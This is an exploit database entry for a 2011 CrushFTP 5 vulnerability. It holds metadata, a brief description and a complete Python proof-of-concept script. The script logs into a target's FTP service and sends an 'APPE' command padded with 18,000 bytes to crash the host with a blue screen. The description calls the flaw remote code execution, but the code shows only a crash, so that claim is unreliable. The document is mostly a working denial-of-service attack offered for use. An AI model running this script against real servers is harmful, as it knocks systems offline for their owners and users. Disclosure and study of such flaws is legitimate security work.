Crush FTP 5 'APPE' command Remote BSOD Poc Exploit

vendor:

CrushFTP 5

by:

BSOD Digital (Fabien DROMAS)

9.3

CVSS

HIGH

Remote Code Execution

119

CWE

Product Name: CrushFTP 5

Affected Version From: 5.7.0_96

Affected Version To: 5.7.0_96

Patch Exists: YES

Related CWE: N/A

CPE: a:crushftp:crushftp_5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2011

Crush FTP 5 ‘APPE’ command Remote BSOD Poc Exploit

This exploit is a proof of concept for a remote code execution vulnerability in Crush FTP 5. The vulnerability is triggered by sending a specially crafted 'APPE' command with 9000 bytes of data. This causes a buffer overflow which leads to a Blue Screen of Death (BSOD) on the target system.

Mitigation:

Upgrade to the latest version of Crush FTP 5, which is not vulnerable to this exploit.

Source

Exploit-DB raw data:

#
#Exploit Title:
#Crush FTP 5 'APPE' command Remote BSOD Poc Exploit
#
#Date: 06/09/2011
#
#Author: BSOD Digital (Fabien DROMAS)
#Mail: bsoddigital@gmail.com
#
#
#Test:
#OS: Windows 7
#Versions: 5.7.0_96
#
#
#Link:
#https://www.crushftp.com/early5/CrushFTP5_PC.zip
#
#!/usr/bin/env python

import socket

host = raw_input("Type Target IP: ")

data1 = ("A" * 9000)
data2 = (" " * 9000)
cmd = ('APPE')

print ("\n--------------------------------------------------\n")
print ("Crush FTP 5 'APPE' command Remote BSOD Poc Exploit\n")
print ("      BSOD Digital - bsoddigital@gmail.com        \n")
print ("--------------------------------------------------\n")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 21))
r=s.recv(1024)
print (r)
s.send("USER test\r\n")
r=s.recv(1024)
print (r)
s.send("PASS test\r\n")
r=s.recv(1024)
print (r)
s.send(cmd + " " + data1 + data2 + '\r\n')
print ("Payload Send!\n")
print ("2 or 3 seconds before the blue screen of the death...")
s.close()